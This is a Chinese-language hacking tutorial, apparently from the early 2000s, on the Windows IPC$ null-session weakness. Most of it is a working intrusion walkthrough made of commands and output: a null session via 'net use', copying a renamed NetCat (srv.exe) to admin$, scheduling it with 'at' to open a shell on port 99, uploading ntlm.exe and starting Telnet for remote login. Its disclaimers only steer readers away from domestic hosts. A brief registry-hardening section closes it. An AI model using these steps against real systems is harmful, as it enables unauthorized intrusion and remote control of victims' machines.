一、什么是IPC$漏洞
IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源
时使用。利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我
们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字
典,进行密码尝试。
二、骇客是如何利用IPC$漏洞
我们要使用到的工具有:
1.流光4.6(http://www.netxeyes.com)有提供下载!流光禁止扫描国内的主机,请不要打免IP的补丁,否
则你就会觉得流光更本没有用处,榕哥这样做的原因也是希望骇客不要破坏国内主机!
其实并不需要我们使用很多工具,因为流光一个就可以帮我们搞定了!
2.SRV这个工具也在流光的目录中,很多防火墙将他列为病毒,其实这是一个很好的工具。全名是NetCat,这
里改名为Srv.exe。用于在主机建立一个端口为99的shell。然后我们就可以TELNET IP 99上去了。
3.Ntlm.exe:是榕哥写的一个程序,用于修改Windows 2000 Telnet Servery身份验证的方式。
测试IP:127.0.0.1
熟悉了使用工具的话,下面我们来看看骇客是怎么入侵的。
第一步:运行流光4.6(如下图所示)
按CTRL+R键弹出扫描框,我们这里只是做个测试,目的是告诉大家这个漏洞的危害,所以我们现在随便选择一段IP进行扫描。我们扫描的是127.0.0.1
其他的我们使用默认,不需要改变设置
第二步:大家打开WIN2000自带的命令提示行,注意:这里我们不是教大家怎么破坏,只是给大家介绍这个漏洞的危害,所以下面的IP是假设的,并不存在。
C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
//这是我用流光扫到的密码~~~我们就拿它开
刀吧~ 上面的意思是与127.0.0.1建立一个连接,因为我们使用流光已经扫到用户名是administrators,密码
为[空],所以第一个双引号那里不用输入什么,后面一个双引号里的是用户名,我们输入administrators//
命令成功完成。
首先大家先把需要用到的工具COPY的你自己的C盘下,就是在流光TOOLS中。
C:\>copy srv.exe \\127.0.0.1\admin$ //先复制srv.exe上去,在流光的Tools目录就有。(这里的ADMIN$是指ADMIN用户的c:\winnt\system32\
大家还可以使用c$,d$这个的意思是C盘与D盘,这看你要复制到什么地方去了)
已复制 1 个文件。(成功了!*.*)
C:\>net time \\127.0.0.1
//查查时间。(这里的时间是指对方计算机的,也就是我们要入侵的127.0.0.1的时间,还有要提醒大家要注意的一点是,请把时间转换为24小时制,因为不少朋友问过我为什么启动不了服务,其实就是因为时间的问题)//
\\127.0.0.1 的当前时间是 2002/3/19 上午 11:00
命令成功完成。
C:\>at \\127.0.0.1 11:05 srv.exe //用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)//
新加了一项作业,其作业 ID = 1
C:\>net time \\127.0.0.1 //再查查够时间没有?!哈! 时间到,LET'S GO FOLLOW ME !//
\\127.0.0.1 的当前时间是 2002/3/19 上午 11:05
命令成功完成。
C:\>telnet 127.0.0.1 99 //我们telnet吧,注意端口是99哦,TELNET默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的SHELL。//
//哈哈!进来了耶! 再给他加上一个ntlm
C:\>copy ntlm.exe \\127.0.0.1\admin$ //我们再开一个DOS窗口,把ntlm.exe上传到主机上。(也是在流光流光的Tools目录)
已复制 1 个文件。
C:\WINNT\system32>ntlm //我们输入ntlm启动吧。(这里的C:\WINNT\system32>指的是对方计算机,我们运行ntlm其实是让这个程序在对方计算机上运行)//
ntlm
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done! //OK了
C:\WINNT\system32>
C:\WINNT\system32>net start telnet //然后直接用net start telnet启动telnet
Telnet 服务器正在启动.
Telnet 服务器已经启动成功。 //哈哈,我们成功了,该上去了。
第三步:我们使用TELNET到对方计算机上去
TELNET 127.0.0.1
接着输入用户名与密码就进入了
(我们已经进来了,使用方法和DOS命令是一样的)
这就是中国黑客入侵美国计算机的方法,在这之前是不是让你觉得很神秘呢?其实很简单的。不要认为这就是黑客的方法,这只能说是骇客。最后希望大家不要那这种方法来实践国内主机,否则我就成罪人了。
三、如何防范IPC$漏洞
看来上面的方法是不是觉得该检测一下自己是否有这个漏洞,还不赶快把这个漏洞给补上?跟我来吧,下面我们将教你如何防范IPC$的入侵
解决方法:
1、禁止建立空连接
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]
RestrictAnonymous = DWORD:00000001
2、禁止管理共享
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
AutoShareServer = DWORD:00000000
3.到http://www.heibai.net/download/show.php?id=2194下载 delshare.zip
4.如果您觉得麻烦的话这样也可以,net share ipc$ /delete 把这个放进你的启动栏里面去
5.如果上面的方法您不会的话,这个方法可以说是最简单的了。把您的密码设置复杂一下,一面被一些不怀好意的人使用工具给破出来。不过想提醒大家一点,在复杂的密码都有可能被破解